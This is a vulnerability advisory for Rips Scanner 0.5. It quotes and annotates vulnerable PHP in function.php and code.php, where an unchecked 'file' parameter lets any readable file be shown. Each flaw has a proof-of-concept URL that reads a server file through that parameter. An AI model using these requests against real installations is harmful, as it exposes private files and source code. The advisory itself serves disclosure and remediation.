Rips Scanner 0.5 Local File Inclusion

2015-12-24T00:00:00
ID PACKETSTORM:135065
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-12-24T00:00:00

Description

                                        
                                            `================================================================================  
# Rips Scanner 0.5 - Local File Inclusion  
================================================================================  
# Vendor Homepage: https://github.com/robocoder/rips-scanner  
# Date: 24/12/2015  
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip  
# Version : 0.5  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/rips-lfi.txt  
================================================================================  
# Vulnerable File : function.php  
  
# Vulnerable Code:  
  
// Excerpt of function.php as quoted by the advisory. The number that starts each line
// is the line number in the original file, not part of the PHP.
// Purpose: print lines $start..$end of the file named by the `file` query parameter.
// `file` is taken from the request unchanged; `start` and `end` are cast to int.
58 $file = $_GET['file'];  
59 $start = (int)$_GET['start'];  
60 $end = (int)$_GET['end'];  
61 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);  
62  
63  
// The only gate on $file: it is non-empty, names an existing regular file, and its
// extension is listed in $FILETYPES (defined outside this excerpt). Nothing confines
// the path to a particular directory, so any readable file with a listed extension passes.
// NOTE(review): a fix would canonicalise the path with realpath() and require the result
// to lie under the directory being scanned; the scanner UI should also not be reachable
// by untrusted clients.
64 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))  
65 {  
// file() reads the contents into an array of lines indexed from 0. Nothing in this
// excerpt include()s or executes the file: what it shows is disclosure of file contents.
66 $lines = file($file);  
67   
// Both bounds must be existing indexes of $lines, otherwise the "wrong file" row is printed.
68 if( isset($lines[$start]) && isset($lines[$end]) )  
69 {  
70 for($i=$start; $i<=$end; $i++)  
71 {  
// highlightline() is defined outside this excerpt; whatever it returns is echoed per line.
72 echo highlightline($lines[$i], $i);  
73 }  
74 } else  
75 {  
76 echo '<tr><td>Sorry, wrong file referenced.</td></tr>';  
77 }  
78 } else  
79 {  
// Reached when `file` is empty, is not a regular file, or has an extension outside $FILETYPES.
80 echo '<tr><td>Sorry, no file referenced.</td></tr>';  
81 }  
  
  
# PoC :  
  
http://localhost/rips/windows/function.php?file=/var/www/html/index.php&start=1&end=20  
  
Parameters :  
file = path/file  
start = 0  
end = number of page's lines  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
  
  
------  
  
  
================================================================================  
# Rips Scanner 0.5 - (code.php) Local File Inclusion  
================================================================================  
# Vendor Homepage: https://github.com/robocoder/rips-scanner  
# Date: 24/12/2015  
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip  
# Version : 0.5  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt  
================================================================================  
# Vulnerable File : code.php  
  
# Vulnerable Code:  
  
  
// Excerpt of code.php as quoted by the advisory. The number that starts each line
// is the line number in the original file, not part of the PHP.
// Purpose: render every line of the file named by the `file` query parameter as a
// two-column HTML table (line numbers, then code).
// `file` is taken from the request unchanged; `lines` is split on commas into $marklines.
102 $file = $_GET['file'];  
103 $marklines = explode(',', $_GET['lines']);  
104 $ext = '.'.pathinfo($file, PATHINFO_EXTENSION);  
105  
106   
// The only gate on $file: it is non-empty, names an existing regular file, and its
// extension is listed in $FILETYPES (defined outside this excerpt). Nothing confines
// the path to a particular directory, so any readable file with a listed extension passes.
// NOTE(review): a fix would canonicalise the path with realpath() and require the result
// to lie under the directory being scanned; the scanner UI should also not be reachable
// by untrusted clients.
107 if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))  
108 {  
// file() reads the contents into an array of lines. Nothing in this excerpt include()s
// or executes the file: what it shows is disclosure of file contents.
109 $lines = file($file);  
110   
111 // place line numbers in extra table for more elegant copy/paste  
without line numbers  
112 echo '<tr><td><table>';  
// $max is set once in the loop initialiser and reused by the second loop below.
// The loop body is the single echo that follows: one row per line, carrying the
// line number $i and an anchor whose id is $i+2.
113 for($i=1, $max=count($lines); $i<=$max;$i++)  
114 echo "<tr><td class=\"linenrcolumn\"><span  
class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';  
115 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';  
116   
117 $in_comment = false;  
118 for($i=0; $i<$max; $i++)  
119 {   
// highlightline() is defined outside this excerpt. Its return value is fed back in as
// $in_comment on the next call and is not echoed here, so it presumably prints the
// highlighted line itself (confirm against its definition).
120 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);  
121 }  
122 } else  
123 {  
// Reached when `file` is empty, is not a regular file, or has an extension outside $FILETYPES.
124 echo '<tr><td>Invalid file specified.</td></tr>';  
125 }  
  
  
# PoC :  
  
http://localhost/rips/windows/code.php?file=/var/www/html/index.php  
  
Vulnerable Parameter : file  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
`